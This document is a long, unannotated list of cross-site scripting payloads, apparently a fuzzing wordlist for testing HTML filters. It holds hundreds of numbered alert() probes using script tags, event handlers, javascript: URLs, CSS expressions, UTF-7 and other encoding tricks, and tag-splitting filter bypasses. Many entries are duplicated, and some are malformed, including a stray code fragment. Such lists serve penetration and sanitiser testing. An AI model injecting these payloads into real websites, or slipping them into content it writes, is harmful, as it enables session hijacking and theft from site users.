- <div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(378));">X
- <script>({set/**/$($){_/**/setter=$,_=javascript:alert(384)}}).$=eval</script>
- <script>({0:#0=eval/#0#/#0#(javascript:alert(385))})</script>
- <script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(386)}),x</script>
- <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(387)')()</script>
- <meta charset="mac-farsi">¼script¾javascript:alert(390)¼/script¾
- X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(391)` >
- 392<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh䎒vior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(392)>`>
- 393<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(393)>>
- 395<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(395) strokecolor=white strokeweight=395000px from=0 to=395000 /></a>
- <a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(396)">XXX</a>
- <event-source src="%(event)s" onload="javascript:alert(399)">
- <a href="javascript:javascript:alert(400)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
- <div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=javascript:alert(401)>">
- <script>javascript:alert(405)</script>
- <IMG SRC="javascript:javascript:alert(406);">
- <IMG SRC=javascript:javascript:alert(407)>
- <IMG SRC=`javascript:javascript:alert(408)`>
- <FRAMESET><FRAME SRC="javascript:javascript:alert(410);"></FRAMESET>
- <BODY ONLOAD=javascript:alert(411)>
- <BODY ONLOAD=javascript:javascript:alert(412)>
- <IMG SRC="jav ascript:javascript:alert(413);">
- <BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(414)>
- <IMG SRC="javascript:javascript:alert(417)"
- <INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(419);">
- <IMG DYNSRC="javascript:javascript:alert(420)">
- <IMG LOWSRC="javascript:javascript:alert(421)">
- <BGSOUND SRC="javascript:javascript:alert(422);">
- <BR SIZE="&{javascript:alert(423)}">
- <LINK REL="stylesheet" HREF="javascript:javascript:alert(425);">
- <STYLE>li {list-style-image: url("javascript:javascript:alert(429)");}</STYLE><UL><LI>XSS
- <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(430);">
- <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(431);">
- <IFRAME SRC="javascript:javascript:alert(432);"></IFRAME>
- <TABLE BACKGROUND="javascript:javascript:alert(433)">
- <TABLE><TD BACKGROUND="javascript:javascript:alert(434)">
- <DIV STYLE="background-image: url(javascript:javascript:alert(435))">
- <DIV STYLE="width:expression(javascript:alert(436));">
- <IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(437))">
- <XSS STYLE="xss:expression(javascript:alert(438))">
- <STYLE TYPE="text/javascript">javascript:alert(439);</STYLE>
- <STYLE>.XSS{background-image:url("javascript:javascript:alert(440)");}</STYLE><A CLASS=XSS></A>
- <STYLE type="text/css">BODY{background:url("javascript:javascript:alert(441)")}</STYLE>
- <!--[if gte IE 4]><SCRIPT>javascript:alert(442);</SCRIPT><![endif]-->
- <BASE HREF="javascript:javascript:alert(443);//">
- <OBJECT classid=clsid:ae24fdae-03c6-445445d445-8b76-0080c744f389><param name=url value=javascript:javascript:alert(445)></OBJECT>
- <HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(446)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
- <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(447)</SCRIPT>"></BODY></HTML>
- <form id="test" /><button form="test" formaction="javascript:javascript:alert(450)">X
- <body onscroll=javascript:alert(451)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
- <P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(452)">
- <STYLE>a{background:url('s454' 's2)}@import javascript:javascript:alert(454);');}</STYLE>
- <meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(455)&&;&&<&&/script&&>
- <SCRIPT onreadystatechange=javascript:javascript:alert(456);></SCRIPT>
- <style onreadystatechange=javascript:javascript:alert(457);></style>
- <?xml version="458.0"?><html:html xmlns:html='http://www.w3.org/458999/xhtml'><html:script>javascript:alert(458);</html:script></html:html>
- <embed code=javascript:javascript:alert(460);></embed>
- <frameset onload=javascript:javascript:alert(462)></frameset>
- <object onerror=javascript:javascript:alert(463)>
- <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(465);">]]</C><X></xml>
- <IMG SRC=&{javascript:alert(466);};>
- <a href="javAascript:javascript:alert(467)">test467</a>
- <a href="javaascript:javascript:alert(468)">test468</a>
- <iframe srcdoc="<iframe/srcdoc=<img/src=''onerror=javascript:alert(470)>>">
- ';alert(471))//';alert(471))//";
- alert(472))//";alert(472))//--
- ></SCRIPT>">'><SCRIPT>alert(473))</SCRIPT>
- <IMG SRC="javascript:alert(476);">
- <IMG SRC=javascript:alert(477)>
- <IMG SRC=JaVaScRiPt:alert(478)>
- <IMG SRC=javascript:alert(479)>
- <IMG SRC=`javascript:alert(480)`>
- <a onmouseover="alert(481)">xxs link</a>
- <a onmouseover=alert(482)>xxs link</a>
- <IMG """><SCRIPT>alert(483)</SCRIPT>">
- <IMG SRC=javascript:alert(484))>
- <IMG SRC=# onmouseover="alert(485)">
- <IMG SRC= onmouseover="alert(486)">
- <IMG onmouseover="alert(487)">
- <IMG SRC="jav ascript:alert(491);">
- <IMG SRC="jav ascript:alert(492);">
- <IMG SRC="jav
- ascript:alert(493);">
- <IMG SRC="jav
ascript:alert(494);">
- perl -e 'print "<IMG SRC=java\0script:alert(495)>";' > out
- <IMG SRC="  javascript:alert(496);">
- <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(498)>
- <<SCRIPT>alert(500);//<</SCRIPT>
- <IMG SRC="javascript:alert(503)"
- \";alert(505);//
- </TITLE><SCRIPT>alert(506);</SCRIPT>
- <INPUT TYPE="IMAGE" SRC="javascript:alert(507);">
- <BODY BACKGROUND="javascript:alert(508)">
- <IMG DYNSRC="javascript:alert(509)">
- <IMG LOWSRC="javascript:alert(510)">
- <STYLE>li {list-style-image: url("javascript:alert(511)");}</STYLE><UL><LI>XSS</br>
- <BODY ONLOAD=alert(514)>
- <BGSOUND SRC="javascript:alert(515);">
- <BR SIZE="&{alert(516)}">
- <LINK REL="stylesheet" HREF="javascript:alert(517);">
- <STYLE>@im\port'\ja\vasc\ript:alert(522)';</STYLE>
- <IMG STYLE="xss:expr/*XSS*/ession(alert(523))">
- exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert(524))'>
- <STYLE TYPE="text/javascript">alert(525);</STYLE>
- <STYLE>.XSS{background-image:url("javascript:alert(526)");}</STYLE><A CLASS=XSS></A>
- <STYLE type="text/css">BODY{background:url("javascript:alert(527)")}</STYLE>
- <STYLE type="text/css">BODY{background:url("javascript:alert(528)")}</STYLE>
- <XSS STYLE="xss:expression(alert(529))">
- ¼script¾alert(531)¼/script¾
- <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(532);">
- <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(534);">
- <IFRAME SRC="javascript:alert(535);"></IFRAME>
- <IFRAME SRC=# onmouseover="alert(536)"></IFRAME>
- <FRAMESET><FRAME SRC="javascript:alert(537);"></FRAMESET>
- <TABLE BACKGROUND="javascript:alert(538)">
- <TABLE><TD BACKGROUND="javascript:alert(539)">
- <DIV STYLE="background-image: url(javascript:alert(540))">
- <DIV STYLE="background-image: url(javascript:alert(542))">
- <DIV STYLE="width: expression(alert(543));">
- <BASE HREF="javascript:alert(544);//">
- <? echo('<SCR)';echo('IPT>alert(549)</SCRIPT>'); ?>
- <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(552)</SCRIPT>">
- <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(553);+ADw-/SCRIPT+AD4-
- <img src=`%00`
 onerror=alert(573)

- <script /*%00*/>/*%00*/alert(577)/*%00*/</script /*%00*/
- <iframe/src="data:text/html,<svg ��load=alert(579)>">
- <meta content="
 580 
; JAVASCRIPT: alert(580)" http-equiv="refresh"/>
- <form><iframe ᛸ src="javascript:alert(588)"ᛸ ;>
- http://www.google<script .com>alert(590)</script
- <script ^__^>alert(594))</script ^__^
- </style ><script :-(>/**/alert(595)/**/</script :-(
- �</form><input typeᧄ"date" onfocus="alert(596)">
- <a href="javascript:void(0)" onmouseover=
javascript:alert(600)
>X</a>
- <script ~~~>alert(601)</script ~~~>
- <iframe/%00/ src=javaSCRIPT:alert(609)
- <%<!--'%><script>alert(626);</script -->
- <script src="data:text/javascript,alert(627)"></script>
- <iframe/onreadystatechange=alert(629)
- <svg/onload=alert(630)
- <input type="text" value=`` <div/onmouseover='alert(632)'>X</div>
- http://www.<script>alert(633)</script .com
- <svg><script ?>alert(635)
- <img src=`xx:xx`onerror=alert(637)>
- <meta http-equiv="refresh" content="0;javascript:alert(639)"/>
- <script>+-+-649-+-+alert(649)</script>
- <body/onload=<!-->ᥤalert(650)>
- <script itworksinallbrowsers>/*<script* */alert(651)</script
- <img src ?itworksonchrome?\/onerror = alert(652)
- <svg><script onlypossibleinopera:-)> alert(654)
- <script x> alert(656) </script 656=2
- <div/onmouseover='alert(657)'> style="x:">
- <--`<img/src=` onerror=alert(658)> --!>
- <div style="position:absolute;top:0;left:0;width:66000%;height:66000%" onmouseover="prompt(660)" onclick="alert(660)">x</button>
- <form><button formaction=javascript:alert(662)>CLICKME
- ‘; alert(667);
- ‘)alert(668);//
- <ScRiPt>alert(669)</sCriPt>
- <IMG SRC=jAVasCrIPt:alert(670)>
- <IMG SRC=”javascript:alert(671);”>
- <IMG SRC=javascript:alert(672)>
- <IMG SRC=javascript:alert(673)>
- <img src=xss onerror=alert(674)>
- <img src=`%00`
 onerror=alert(681)

- <script /*%00*/>/*%00*/alert(685)/*%00*/</script /*%00*/
- <iframe/src="data:text/html,<svg ��load=alert(687)>">
- <meta content="
 688 
; JAVASCRIPT: alert(688)" http-equiv="refresh"/>
- <form><iframe ᬰ src="javascript:alert(696)"ᬰ ;>
- http://www.google<script .com>alert(698)</script
- <script ^__^>alert(702))</script ^__^
- </style ><script :-(>/**/alert(703)/**/</script :-(
- �</form><input typeᨰ"date" onfocus="alert(704)">
- <a href="javascript:void(0)" onmouseover=
javascript:alert(708)
>X</a>
- <script ~~~>alert(709)</script ~~~>
- <iframe/%00/ src=javaSCRIPT:alert(717)
- <%<!--'%><script>alert(734);</script -->
- <script src="data:text/javascript,alert(735)"></script>
- <iframe/onreadystatechange=alert(737)
- <svg/onload=alert(738)
- <input type="text" value=`` <div/onmouseover='alert(740)'>X</div>
- http://www.<script>alert(741)</script .com
- <svg><script ?>alert(743)
- <img src=`xx:xx`onerror=alert(745)>
- <meta http-equiv="refresh" content="0;javascript:alert(746)"/>
- <script>+-+-756-+-+alert(756)</script>
- <body/onload=<!-->ᶒalert(757)>
- <script itworksinallbrowsers>/*<script* */alert(758)</script
- <img src ?itworksonchrome?\/onerror = alert(759)
- <svg><script onlypossibleinopera:-)> alert(761)
- <script x> alert(763) </script 763=2
- <div/onmouseover='alert(764)'> style="x:">
- <--`<img/src=` onerror=alert(765)> --!>
- <div style="xg-p:absolute;top:0;left:0;width:76700%;height:76700%" onmouseover="prompt(767)" onclick="alert(767)">x</button>
- <form><button formaction=javascript:alert(769)>CLICKME
- ‘;alert(775))//’;alert(775))//”;alert(775))//”;alert(775))//–></SCRIPT>”>’><SCRIPT>alert(775))</SCRIPT>
- <IMG “””><SCRIPT>alert(776)</SCRIPT>”>
- <IMG SRC=javascript:alert(777))>
- <IMG SRC=”jav ascript:alert(778);”>
- <IMG SRC=”jav ascript:alert(779);”>
- <<SCRIPT>alert(780);//<</SCRIPT>
- %253cscript%253ealert(781)%253c/script%253e
- “><s”%2b”cript>alert(782)</script>
- foo<script>alert(783)</script>
- <scr<script>ipt>alert(784)</scr</script>ipt>
- <BODY BACKGROUND=”javascript:alert(788)”>
- <BODY ONLOAD=alert(789)>
- <INPUT TYPE=”IMAGE” SRC=”javascript:alert(790);”>
- <IMG SRC=”javascript:alert(791)”
- javascript:alert(793)
- <img src="javascript:alert(794);">
- <img src=javascript:alert(795)>
- <"';alert(796))//\';alert(796))//";alert(796))//\";alert(796))//--></SCRIPT>">'><SCRIPT>alert(796))</SCRIPT>
- <IFRAME SRC="javascript:alert(798);"></IFRAME>
- <<SCRIPT>alert(805);//<</SCRIPT>
- <"';alert(806))//\';alert(806))//";alert(806))//\";alert(806))//--></SCRIPT>">'><SCRIPT>alert(806))</SCRIPT>
- ';alert(807))//\';alert(807))//";alert(807))//\";alert(807))//--></SCRIPT>">'><SCRIPT>alert(807))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search
- <script>alert(808)</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
- <script>alert(809);</script>&search=1
- 0&q=';alert(810))//\';alert%2?8810))//";alert(String.fromCharCode?(88,83,83))//\";alert(810)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search
- <BODY ONLOAD=alert(812)>
- <body onscroll=alert(815)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
- <form><button formaction="javascript:alert(816)">lol
- <!--<img src="--><img src=x onerror=alert(817)//">
- <![><img src="]><img src=x onerror=alert(818)//">
- <style><img src="</style><img src=x onerror=alert(819)//">
- <? foo="><script>alert(820)</script>">
- <! foo="><script>alert(821)</script>">
- </ foo="><script>alert(822)</script>">
- <? foo="><x foo='?><script>alert(823)</script>'>">
- <! foo="[[[Inception]]"><x foo="]foo><script>alert(824)</script>">
- <% foo><x foo="%><script>alert(825)</script>">
- <svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(829)</script></svg>
- <SCRIPT>alert(830)</SCRIPT>
- \\";alert(831);//
- </TITLE><SCRIPT>alert(832);</SCRIPT>
- <INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert(833);\">
- <BODY BACKGROUND=\"javascript:alert(834)\">
- <BODY ONLOAD=alert(835)>
- <IMG DYNSRC=\"javascript:alert(836)\">
- <IMG LOWSRC=\"javascript:alert(837)\">
- <BGSOUND SRC=\"javascript:alert(838);\">
- <BR SIZE=\"&{alert(839)}\">
- <LINK REL=\"stylesheet\" HREF=\"javascript:alert(841);\">
- <STYLE>li {list-style-image: url(\"javascript:alert(847)\");}</STYLE><UL><LI>XSS
- žscriptualert(851)ž/scriptu
- <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert(852);\">
- <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert(854);\"
- <IFRAME SRC=\"javascript:alert(855);\"></IFRAME>
- <FRAMESET><FRAME SRC=\"javascript:alert(856);\"></FRAMESET>
- <TABLE BACKGROUND=\"javascript:alert(857)\">
- <TABLE><TD BACKGROUND=\"javascript:alert(858)\">
- <DIV STYLE=\"background-image: url(javascript:alert(859))\">
- <DIV STYLE=\"background-image: url(javascript:alert(861))\">
- <DIV STYLE=\"width: expression(alert(862));\">
- <STYLE>@im\port'\ja\vasc\ript:alert(863)';</STYLE>
- <IMG STYLE=\"xss:expr/*XSS*/ession(alert(864))\">
- <XSS STYLE=\"xss:expression(alert(865))\">
- xss:ex/*XSS*//*/*/pression(alert(867))'>
- <STYLE TYPE=\"text/javascript\">alert(868);</STYLE>
- <STYLE>.XSS{background-image:url(\"javascript:alert(869)\");}</STYLE><A CLASS=XSS></A>
- <STYLE type=\"text/css\">BODY{background:url(\"javascript:alert(870)\")}</STYLE>
- <SCRIPT>alert(872);</SCRIPT>
- <BASE HREF=\"javascript:alert(874);//\">
- <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert(876)></OBJECT>
- d=\"alert(882);\\")\";
- <XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert(885);\">]]>
- <XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:alert(887)\"></B></I></XML>
- <t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>alert(894)</SCRIPT>\">
- echo('IPT>alert(899)</SCRIPT>'); ?>
- <META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert(902)</SCRIPT>\">
- <HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert(903);+ADw-/SCRIPT+AD4-
- <IMG SRC=\"javascript:alert(991)\"
- <<SCRIPT>alert(994);//<</SCRIPT>
- <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(996)>
- <IMG SRC=\" javascript:alert(998);\">
- perl -e 'print \"<SCR\0IPT>alert(999)</SCR\0IPT>\";' > out
- perl -e 'print \"<IMG SRC=java\0script:alert(1000)>\";' > out
- <IMG SRC=\"jav
ascript:alert(1001);\">
- <IMG SRC=\"jav
- ascript:alert(1002);\">
- <IMG SRC=\"jav ascript:alert(1003);\">
- <IMG SRC=javascript:alert(1006)>
- <IMG SRC=javascript:alert(1007))>
- <IMG \"\"\"><SCRIPT>alert(1008)</SCRIPT>\">
- <IMG SRC=`javascript:alert(1009)`>
- <IMG SRC=javascript:alert(1010)>
- <IMG SRC=JaVaScRiPt:alert(1011)>
- <IMG SRC=javascript:alert(1012)>
- <IMG SRC=\"javascript:alert(1013);\">
- ';alert(1016))//\';alert(1016))//\";alert(1016))//\\";alert(1016))//--></SCRIPT>\">'><SCRIPT>alert(1016))</SCRIPT>
- ';alert(1017))//\';alert(1017))//";alert(1017))//\";alert(1017))//--></SCRIPT>">'><SCRIPT>alert(1017))</SCRIPT>
- <IMG SRC="javascript:alert(1020);">
- <IMG SRC=javascript:alert(1021)>
- <IMG SRC=javascrscriptipt:alert(1022)>
- <IMG SRC=JaVaScRiPt:alert(1023)>
- <IMG """><SCRIPT>alert(1024)</SCRIPT>">
- <IMG SRC="  javascript:alert(1025);">
- <<SCRIPT>alert(1028);//<</SCRIPT>
- <SCRIPT>a=/XSS/alert(1029)</SCRIPT>
- \";alert(1030);//
- </TITLE><SCRIPT>alert(1031);</SCRIPT>
- ¼script¾alert(1032)¼/script¾
- <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(1033);">
- <IFRAME SRC="javascript:alert(1034);"></IFRAME>
- <FRAMESET><FRAME SRC="javascript:alert(1035);"></FRAMESET>
- <TABLE BACKGROUND="javascript:alert(1036)">
- <TABLE><TD BACKGROUND="javascript:alert(1037)">
- <DIV STYLE="background-image: url(javascript:alert(1038))">
- <DIV STYLE="width: expression(alert(1040));">
- <STYLE>@im\port'\ja\vasc\ript:alert(1041)';</STYLE>
- <IMG STYLE="xss:expr/*XSS*/ession(alert(1042))">
- <XSS STYLE="xss:expression(alert(1043))">
- exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert(1044))'>
- <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert(1048)</SCRIPT>"></BODY></HTML>
- <form id="test" /><button form="test" formaction="javascript:alert(1050)">TESTHTML5FORMACTION
- <form><button formaction="javascript:alert(1051)">crosssitespt
- <frameset onload=alert(1052)>
- <!--<img src="--><img src=x onerror=alert(1053)//">
- <style><img src="</style><img src=x onerror=alert(1054)//">
- <embed src="javascript:alert(1057)">
- <? foo="><script>alert(1058)</script>">
- <! foo="><script>alert(1059)</script>">
- </ foo="><script>alert(1060)</script>">
- <script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1062)}),x</script>
- <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1063)')()</script>
- <script src="#">{alert(1064)}</script>;1064
- <script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1065)',384,null,'rsa-dual-use')</script>
- <svg xmlns="#"><script>alert(1066)</script></svg>
- <svg onload="javascript:alert(1067)" xmlns="#"></svg>
- <iframe xmlns="#" src="javascript:alert(1068)"></iframe>
- +ADw-script+AD4-alert(1069)+ADw-/script+AD4-
- %2BADw-script+AD4-alert(1070)%2BADw-/script%2BAD4-
- +ACIAPgA8-script+AD4-alert(1071)+ADw-/script+AD4APAAi-
- %253cscript%253ealert(1073)%253c/script%253e
- “><s”%2b”cript>alert(1074)</script>
- “><ScRiPt>alert(1075)</script>
- “><<script>alert(1076);//<</script>
- foo<script>alert(1077)</script>
- <scr<script>ipt>alert(1078)</scr</script>ipt>
- ‘; alert(1080); var foo=’
- foo\’; alert(1081);//’;
- </script><script >alert(1082)</script>
- <img src=asdf onerror=alert(1083)>
- <BODY ONLOAD=alert(1084)>
- <script>alert(1085)</script>
- "><script>alert(1086))</script>
- <video src=1087 onerror=alert(1087)>
- <audio src=1088 onerror=alert(1088)>
- ';alert(1089))//';alert(1089))//";alert(1089))//";alert(1089))//--></SCRIPT>">'><SCRIPT>alert(1089))</SCRIPT>
- 0\"autofocus/onfocus=alert(1091)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
- <IMG SRC="javascript:alert(1097);">
- <IMG SRC=javascript:alert(1098)>
- <IMG SRC=JaVaScRiPt:alert(1099)>
- <IMG SRC=javascript:alert(1100)>
- <IMG SRC=`javascript:alert(1101)`>
- <a onmouseover="alert(1102)">xxs link</a>
- <a onmouseover=alert(1103)>xxs link</a>
- <IMG """><SCRIPT>alert(1104)</SCRIPT>">
- <IMG SRC=javascript:alert(1105))>
- <IMG SRC=# onmouseover="alert(1106)">
- <IMG SRC= onmouseover="alert(1107)">
- <IMG onmouseover="alert(1108)">
- <IMG SRC=/ onerror="alert(1109))"></img>
- <IMG SRC="jav ascript:alert(1115);">
- <IMG SRC="jav ascript:alert(1116);">
- <IMG SRC="jav
- ascript:alert(1117);">
- <IMG SRC="jav
ascript:alert(1118);">
- <IMG SRC="  javascript:alert(1119);">
- <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(1121)>
- <<SCRIPT>alert(1123);//<</SCRIPT>
- <IMG SRC="javascript:alert(1126)"
- \";alert(1128);//
- </script><script>alert(1129);</script>
- </TITLE><SCRIPT>alert(1130);</SCRIPT>
- <INPUT TYPE="IMAGE" SRC="javascript:alert(1131);">
- <BODY BACKGROUND="javascript:alert(1132)">
- <IMG DYNSRC="javascript:alert(1133)">
- <IMG LOWSRC="javascript:alert(1134)">
- <STYLE>li {list-style-image: url("javascript:alert(1135)");}</STYLE><UL><LI>XSS</br>
- <BODY ONLOAD=alert(1138)>
- <BGSOUND SRC="javascript:alert(1139);">
- <BR SIZE="&{alert(1140)}">
- <LINK REL="stylesheet" HREF="javascript:alert(1141);">
- <STYLE>@im\port'\ja\vasc\ript:alert(1146)';</STYLE>
- <IMG STYLE="xss:expr/*XSS*/ession(alert(1147))">
- xss:ex/*XSS*//*/*/pression(alert(1149))'>
- <STYLE TYPE="text/javascript">alert(1150);</STYLE>
- <STYLE>.XSS{background-image:url("javascript:alert(1151)");}</STYLE><A CLASS=XSS></A>
- <STYLE type="text/css">BODY{background:url("javascript:alert(1152)")}</STYLE>
- <XSS STYLE="xss:expression(alert(1153))">
- ¼script¾alert(1155)¼/script¾
- <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(1156);">
- <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(1158);">
- <IFRAME SRC="javascript:alert(1159);"></IFRAME>
- <IFRAME SRC=# onmouseover="alert(1160)"></IFRAME>
- <FRAMESET><FRAME SRC="javascript:alert(1161);"></FRAMESET>
- <TABLE BACKGROUND="javascript:alert(1162)">
- <TABLE><TD BACKGROUND="javascript:alert(1163)">
- <DIV STYLE="background-image: url(javascript:alert(1164))">
- <DIV STYLE="background-image: url(javascript:alert(1166))">
- <DIV STYLE="width: expression(alert(1167));">
- <!--[if gte IE 4]><SCRIPT>alert(1168);</SCRIPT><![endif]-->
- <BASE HREF="javascript:alert(1169);//">
- <? echo('<SCR)';echo('IPT>alert(1172)</SCRIPT>'); ?>
- <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(1174)</SCRIPT>">
- <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(1175);+ADw-/SCRIPT+AD4-
- 0\"autofocus/onfocus=alert(1184)--><video/poster/ error=prompt(2)>"-confirm(3)-"
- veris-->group<svg/onload=alert(1185)//
- #"><img src=M onerror=alert(1186);>
- element[attribute='<img src=x onerror=alert(1187);>
- [<blockquote cite="]">[" onmouseover="alert(1188);" ]
- <scr<script>ipt>alert(1195)</scr</script>ipt><scr<script>ipt>alert(1195)</scr</script>ipt>
- <sCR<script>iPt>alert(1196)</SCr</script>IPt>
- %253Cscript%253Ealert(1198)%253C%252Fscript%253E
- <IMG SRC=x onload="alert(1199))">
- <IMG SRC=x onafterprint="alert(1200))">
- <IMG SRC=x onbeforeprint="alert(1201))">
- <IMG SRC=x onbeforeunload="alert(1202))">
- <IMG SRC=x onerror="alert(1203))">
- <IMG SRC=x onhashchange="alert(1204))">
- <IMG SRC=x onload="alert(1205))">
- <IMG SRC=x onmessage="alert(1206))">
- <IMG SRC=x ononline="alert(1207))">
- <IMG SRC=x onoffline="alert(1208))">
- <IMG SRC=x onpagehide="alert(1209))">
- <IMG SRC=x onpageshow="alert(1210))">
- <IMG SRC=x onpopstate="alert(1211))">
- <IMG SRC=x onresize="alert(1212))">
- <IMG SRC=x onstorage="alert(1213))">
- <IMG SRC=x onunload="alert(1214))">
- <IMG SRC=x onblur="alert(1215))">
- <IMG SRC=x onchange="alert(1216))">
- <IMG SRC=x oncontextmenu="alert(1217))">
- <IMG SRC=x oninput="alert(1218))">
- <IMG SRC=x oninvalid="alert(1219))">
- <IMG SRC=x onreset="alert(1220))">
- <IMG SRC=x onsearch="alert(1221))">
- <IMG SRC=x onselect="alert(1222))">
- <IMG SRC=x onsubmit="alert(1223))">
- <IMG SRC=x onkeydown="alert(1224))">
- <IMG SRC=x onkeypress="alert(1225))">
- <IMG SRC=x onkeyup="alert(1226))">
- <IMG SRC=x onclick="alert(1227))">
- <IMG SRC=x ondblclick="alert(1228))">
- <IMG SRC=x onmousedown="alert(1229))">
- <IMG SRC=x onmousemove="alert(1230))">
- <IMG SRC=x onmouseout="alert(1231))">
- <IMG SRC=x onmouseover="alert(1232))">
- <IMG SRC=x onmouseup="alert(1233))">
- <IMG SRC=x onmousewheel="alert(1234))">
- <IMG SRC=x onwheel="alert(1235))">
- <IMG SRC=x ondrag="alert(1236))">
- <IMG SRC=x ondragend="alert(1237))">
- <IMG SRC=x ondragenter="alert(1238))">
- <IMG SRC=x ondragleave="alert(1239))">
- <IMG SRC=x ondragover="alert(1240))">
- <IMG SRC=x ondragstart="alert(1241))">
- <IMG SRC=x ondrop="alert(1242))">
- <IMG SRC=x onscroll="alert(1243))">
- <IMG SRC=x oncopy="alert(1244))">
- <IMG SRC=x oncut="alert(1245))">
- <IMG SRC=x onpaste="alert(1246))">
- <IMG SRC=x onabort="alert(1247))">
- <IMG SRC=x oncanplay="alert(1248))">
- <IMG SRC=x oncanplaythrough="alert(1249))">
- <IMG SRC=x oncuechange="alert(1250))">
- <IMG SRC=x ondurationchange="alert(1251))">
- <IMG SRC=x onemptied="alert(1252))">
- <IMG SRC=x onended="alert(1253))">
- <IMG SRC=x onerror="alert(1254))">
- <IMG SRC=x onloadeddata="alert(1255))">
- <IMG SRC=x onloadedmetadata="alert(1256))">
- <IMG SRC=x onloadstart="alert(1257))">
- <IMG SRC=x onpause="alert(1258))">
- <IMG SRC=x onplay="alert(1259))">
- <IMG SRC=x onplaying="alert(1260))">
- <IMG SRC=x onprogress="alert(1261))">
- <IMG SRC=x onratechange="alert(1262))">
- <IMG SRC=x onseeked="alert(1263))">
- <IMG SRC=x onseeking="alert(1264))">
- <IMG SRC=x onstalled="alert(1265))">
- <IMG SRC=x onsuspend="alert(1266))">
- <IMG SRC=x ontimeupdate="alert(1267))">
- <IMG SRC=x onvolumechange="alert(1268))">
- <IMG SRC=x onwaiting="alert(1269))">
- <IMG SRC=x onshow="alert(1270))">
- <IMG SRC=x ontoggle="alert(1271))">
- <META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1272)";
- <IMG SRC=x onload="alert(1273))">
- <INPUT TYPE="BUTTON" action="alert(1274)"/>
- "><h1><IFRAME SRC="javascript:alert(1275);"></IFRAME>">123</h1>
- "><h1><IFRAME SRC=# onmouseover="alert(1276)"></IFRAME>123</h1>
- <IFRAME SRC="javascript:alert(1277);"></IFRAME>
